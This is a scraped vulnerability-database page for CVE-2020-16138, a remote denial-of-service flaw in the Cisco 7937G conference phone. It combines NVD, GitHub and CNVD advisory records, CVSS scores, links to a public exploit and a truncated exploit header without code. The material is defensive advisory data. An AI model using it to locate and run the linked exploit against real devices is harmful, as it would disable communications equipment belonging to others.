        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-08-12T21:15:12.063",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-82JM-C3F2-7937

Vulnerability from github – Published: 2022-05-24 22:28 – Updated: 2024-03-21 03:33

Details

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2020-16138"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-08-12T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information.",
  "id": "GHSA-82jm-c3f2-7937",
  "modified": "2024-03-21T03:33:55Z",
  "published": "2022-05-24T22:28:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-16138"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html"
    },
    {
      "type": "WEB",
      "url": "https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G"
    },
    {
      "type": "WEB",
      "url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

CNVD-2020-47312

Vulnerability from cnvd - Published: 2020-08-20

Title

Cisco 7937G输入验证错误漏洞

Description

Cisco 7937G是美国思科（Cisco）公司的一款在线会议终端设备。 Cisco 7937G 1-4-4-0版本至1-4-5-7版本中存在安全漏洞。攻击者可利用该漏洞造成拒绝服务。

Severity

高

Formal description

厂商尚未提供漏洞修复方案，请关注厂商主页更新： https://www.cisco.com/

Reference

https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html

Impacted products

Name
Cisco Cisco 7937G >=1-4-4-0，<=1-4-5-7

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2020-16138",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2020-16138"
    }
  },
  "description": "Cisco 7937G\u662f\u7f8e\u56fd\u601d\u79d1\uff08Cisco\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u5728\u7ebf\u4f1a\u8bae\u7ec8\u7aef\u8bbe\u5907\u3002\n\nCisco 7937G 1-4-4-0\u7248\u672c\u81f31-4-5-7\u7248\u672c\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002",
  "formalWay": "\u5382\u5546\u5c1a\u672a\u63d0\u4f9b\u6f0f\u6d1e\u4fee\u590d\u65b9\u6848\uff0c\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\u66f4\u65b0\uff1a\r\nhttps://www.cisco.com/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2020-47312",
  "openTime": "2020-08-20",
  "products": {
    "product": "Cisco Cisco 7937G \u003e=1-4-4-0\uff0c\u003c=1-4-5-7"
  },
  "referenceLink": "https://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html",
  "serverity": "\u9ad8",
  "submitTime": "2020-08-12",
  "title": "Cisco 7937G\u8f93\u5165\u9a8c\u8bc1\u9519\u8bef\u6f0f\u6d1e"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2020-16138 (GCVE-0-2020-16138)

VAR-202008-0711

Date: 2020-08-10

Exploit Author: Cody Martin

Vendor Homepage: https://cisco.com

Version: <=SIP-1-4-5-7

Tested On: SIP-1-4-5-5, SIP-1-4-5-7

CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137

!/usr/bin/python

GSD-2020-16138

FKIE_CVE-2020-16138

GHSA-82JM-C3F2-7937

CNVD-2020-47312

Tags

Sightings

Nomenclature